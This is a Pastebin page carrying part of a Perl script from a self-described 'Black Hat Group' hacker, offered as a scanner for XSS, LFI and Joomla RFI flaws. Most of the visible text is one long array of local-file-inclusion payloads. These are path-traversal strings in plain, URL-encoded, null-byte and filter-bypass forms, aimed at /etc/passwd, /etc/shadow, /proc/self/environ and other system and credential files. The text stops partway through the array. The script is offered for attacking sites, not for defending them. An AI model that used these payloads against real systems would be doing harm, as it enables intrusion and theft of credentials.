API tools faq
paste
Advertisement
G3n3Rall

BHG Multi Scanner [XSS , LFI , Joomla RFI]

G3n3Rall
May 19th, 2012
1,022
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 47.00 KB | None | 0 0
raw download clone embed print report
  1. Hi Guys
  2.  
  3. Multi Scanner Support : LFI , XSS , Joomla RFI :D
  4. it have txt output too
  5.  
  6.  
  7.  
  8. #!/usr/bin/perl
  9. #Multi Scanner VERSION BETA [XSS - LFI - RFI]
  10. #Black Hat Group Security Center
  11. #Code By G3n3Rall
  12. #visit us => Black-hg.org  
  13. #our forum => Black-hg.org/cc
  14. #AnTi.SecurityBoy@Gmail.com
  15. #We Are : Net.Edit0r , A.Crox , 3H34N , Am!n , tHe.K!ll3r , ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper ,Nitrojen90 .....
  16. #IRANIAN HACKERS
  17. use LWP::Simple;
  18. system(($^O eq 'MSWin32') ? 'cls' : 'clear');
  19. print "#############################################################";
  20. print "\n\t\t #BHG Multi Scanner [XSS - LFI - RFI]";
  21. print "\n\t\t <<<  www.black-hg.org | www.black-hg.org/cc/  >>>";
  22. print "\n\t\t Code By G3n3Rall";
  23. sleep (1);
  24. print "\n\n\t\t What You want to do ? ";
  25. print "\n \t\t 1- XSS SCAN ";
  26. print "\n \t\t 2- LFI SCAN ";
  27. print "\n \t\t 3- RFI SCAN (FOR JOOMLA) ";
  28. print "\n \t\t 4- XSS & LFI ";
  29. print  "\n\n \t\t 5- Exit\n";
  30. print "\n Choose :";
  31. $ID =<STDIN>;
  32. ######
  33. @LFI =("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F..